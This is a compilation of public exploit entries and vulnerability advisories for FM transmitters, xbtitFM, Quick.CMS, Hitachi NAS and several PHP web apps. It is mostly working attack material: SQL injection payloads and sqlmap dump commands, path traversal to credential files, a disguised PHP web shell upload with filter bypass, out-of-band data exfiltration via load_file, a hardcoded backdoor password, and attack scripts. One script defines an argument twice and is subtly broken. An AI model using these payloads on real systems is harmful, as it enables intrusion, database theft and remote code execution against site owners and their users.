sys.argv[4] opt_map = { "admin" : "admin", "user" : "user", "backdoor" : "backdoor" } if opt in opt_map: auth_cookie = authenticate(ipaddr, opt_map[opt]) if auth_cookie: cstop = threading.Event() lt = threading.Thread(target=just_listen_to_me, args=(9999, cstop)) lt.start() execute(ipaddr, auth_cookie, command, listen_ip) cstop.set() lt.join() else: print("Invalid option.")

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: Unauthorized user could exploit this vulnerability to change his/her password, potentially gaining unauthorized access to sensitive information or performing actions beyond her/his designated permissions. Tested on: GNU/Linux 3.10.53 (armv7l) icorem6solox lighttpd/1.4.33 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2024-5811 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php 10.11.2023 -- PoC request of a user changing his own password. Only admin can edit users. No permissions or Cookie check. $ curl -s -H "Cookie: name=user-1702119917" \ http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t HTTP/1.1 200 OK Content-type: text/html Cache-control: no-cache Set-Cookie: name=user-1702119917; max-age=315360000 Transfer-Encoding: chunked Date: Sat, 9 Dec 2023 11:05:17 GMT Server: lighttpd/1.4.33 oc=4&resp=0

TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: The transmitter has a hidden super administrative account 'factory' that has the hardcoded password 'inokram25' that allows full access to the web management interface configuration. The factory account is not visible in the users page of the application and the password cannot be changed through any normal operation of the device. The backdoor lies in the /js_files/LogIn_local.js script file. Attackers could exploit this vulnerability by logging in using the backdoor credentials for the web panel gaining also additional functionalities including: unit configuration, parameter modification, EEPROM overwrite, clearing DB, and factory log modification. Tested on: GNU/Linux 3.10.53 (armv7l) icorem6solox lighttpd/1.4.33 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2024-5809 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5809.php CWE ID: 912 CWE URL: https://cwe.mitre.org/data/definitions/912.html 10.11.2023 -- The credentials can be seen in the auto_login() JS function in the unprotected /js_files/LogIn_local.js file: $ curl -s http://10.0.8.3:88/js_files/LogIn_local.js |grep -A2 "auto_login()" function auto_login() { // @mod1 var username = "factory"; var password = "inokram25"; $

# Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities # Date: 22-01-2024 # Vendor Homepage: https://xbtitfm.eu # Affected versions: 4.1.18 and prior # Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM. The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account. Looking at the state and the age of the codebase there are probably more, but who cares anyway... [Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H] Some examples: Get DB name: /shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(DATABA SE() AS NCHAR),0)),1,100)))) Get DB user: /shoutedit.php?action=edit&msgid=1337 AND EXTRACTVALUE(0,CONCAT(0,0,(MID((IFNULL(CAST(CURREN T_USER() AS NCHAR),0)),1,100)))) Get password hash of any user (might need some modification to work on different instances): /shoutedit.php?action=edit&msgid=1337 OR (1,1) = (SELECT COUNT(0),CONCAT((SELECT CONCAT_WS(0x3a,id,username,password,email,0x3a3a3a ) FROM xbtit_users WHERE username='admin_username_or_whatever_you_like'),FL OOR(RAND(0)*2)) FROM (information_schema.tables) GROUP BY 2); Automate it with sqlmap to dump the database. 1) Get DB name sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch --current-db 2) Get table names sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name --tables 3) Dump users table (usually called xbtit_users) sqlmap -u "https://example.xyz/shoutedit.php?action=edit&msgid=1337" -p msgid --technique=E --answers="include=N" --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump 4) Crack hashes (usually unsalted MD5, yey!) hashcat -m 0 xbtitfm_exported_hashes.txt wordlist.txt Pro tip: Use All-in-One-P (https://weakpass.com/all-in-one) [Unauthenticated Path traversal - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N] 1) Intentionally search for a file that doesn't exist to get the web application path e.g. (/home/xbtitfm/public_html/) https[:]//example.xyz/nfo/nfogen.php?nfo=random_value_to_get_error_that_reve als_the_real_path 2) Read files that contain database credentials. https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/settings.php https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/include/update.php Or any other system file you want. https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../etc/passwd 3) Now who needs the SQLi to dump the DB when you have this gem? Check if the following file is configured https[:]//example.xyz/nfo/nfogen.php?nfo=../../../../../../../home/xbtitfm/public_html/sxd/cfg.php If so, go to https[:]//example.xyz/sxd (CBT Sql backup utilitiy aka Sypex-Dumper), login with the DB credentials you just found, now export the DB with on click. Nice and easy. [Insecure file upload - Remote Code Execution (Authenticated)- CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H] If that wasn't enough already and you want RCE, visit https[:]//example.xyz/index.php?page=file_hosting If the file hosting feature (hack) is enabled, then simply just upload a PHP shell with the following bypass. Changing the Content-Type of the file to image/gif and the first bytes to GIF89a; are enough to bypass the filetype checks. A silly countermeasure against PHP files is in place so make sure you change <?php to <?pHp to bypass it. Content-Disposition: form-data; name="file"; filename="definately_not_a_shell.php" Content-Type: image/gif GIF89a; <html> <body> <form method="GET" name="<?pHp echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?pHp if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> The web shell will then be uploaded here: https[:]//example.xyz/file_hosting/definately_not_a_shell.php If the file hosting feature is disabled, extract and crack the hash of an admin, then enable the feature from the administration panel and upload the shell.

# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass # Google Dork: N/A # Date: 02-03-2024 # Exploit Author: ./H4X.Forensics - Diyar # Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/> # Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip] # Version: 6.7 # Tested on: Windows # CVE : N/A How to exploit : *--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php *--> Enter any Email like : [email protected]<mailto:[email protected]> *--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1 *--> Tick the Checkbox *--> Press Login *--> Congratz! *--> SQL Injection Authentication Bypass Payload : ' or '1'='1 *--> Payloads Can be use : ' or '1'='1 ' or ''=' ' or 1]%00 ' or /* or ' ' or "a" or ' ' or 1 or ' ' or true() or '

# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi # Date: 20-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-28595 # Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php. # POC: 1. Here we go to : http://127.0.0.1/taskmatic/index.php 2. Now login with default Username and Password. 3. Visit the URL: http://127.0.0.1/taskmatic/update-admin.php?admin_id=3'||(SELECT 0x697a7843 WHERE 5649=5649 AND (SELECT 2097 FROM (SELECT(SLEEP(5)))JzJH))||' 4. Page will load for 5 seconds because of time-based sql injection # Reference: https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-28595.md

# Exploit Title: Blood Bank 1.0 - 'bid' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46022 ------------------------------------------------------------------------------- # Description: The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to exploit the parameter using Burp Collaborator to initiate OOB SQL injection attacks. Through this technique, an attacker can potentially extract sensitive information from the databases. Vulnerable File: /delete.php Parameter Name: bid # Proof of Concept: ---------------------- 1. Intercept the request to cancel.php via Burp Suite 2. Inject the payload to the vulnerable parameters 3. Payload: 3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b' 4. Example request for bid parameter: --- GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.domain.oastify.com\\a.txt')))%2b' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Referer: http://localhost/bloodbank/bloodinfo.php Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 --- 5. Database and version information is seized via Burp Suite Collaborator

# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure # CVE: CVE-2023-6538 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-6538 PoC", usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: parser.add_argument( "--host", required=True, type=str, help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" ) # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="JSESSIONID cookie value" ) # Create --sso argument: parser.add_argument( "--sso", required=True, type=str, help="JSESSIONIDSSO cookie value" ) # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="Server ID value" ) args = parser.parse_args() def download_file(hostname, jsessionid, jsessionidsso, serverid): # Set the filename: filename = "registry_data.tgz" # Vulnerable SMU URL: smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}" # GET request cookies smu_cookies = { "JSESSIONID": jsessionid, "JSESSIONIDSSO": jsessionidsso } # GET request headers: smu_headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Dnt": "1", "Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close" } # Send the request: with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: with open(filename, 'wb') as backup_archive: # Write the zip file to the CWD: backup_archive.write(file_download.content) print(f"{filename} has been downloaded to {getcwd()}") if __name__ == "__main__": download_file(args.host, args.id, args.sso, args.id)

# Exploit Title: Simple Task List 1.0 - 'status' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46023 ------------------------------------------------------------------------------- # Description: Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database. Vulnerable File: /addTask.php Parameter Name: status # Proof of Concept: ---------------------- 1. Register and login the system 2. Add a project and a task 3. Then use the sqlmap to exploit 4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=<php-cookie-value>" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db # SQLMap Response: ---------------------- --- Parameter: status (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||' ---

# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645 # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46024 ------------------------------------------------------------------------------- # Description: Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database. Vulnerable File: /index.php Parameter Name: searchdata # Proof of Concept: ---------------------- Execute sqlmap using either the 'searchdata' parameter to retrieve the current database: sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db SQLMap Response: ---------------------- --- Parameter: searchdata (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search= Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: searchdata=test%';SELECT SLEEP(5)#&search= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search= Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search= ---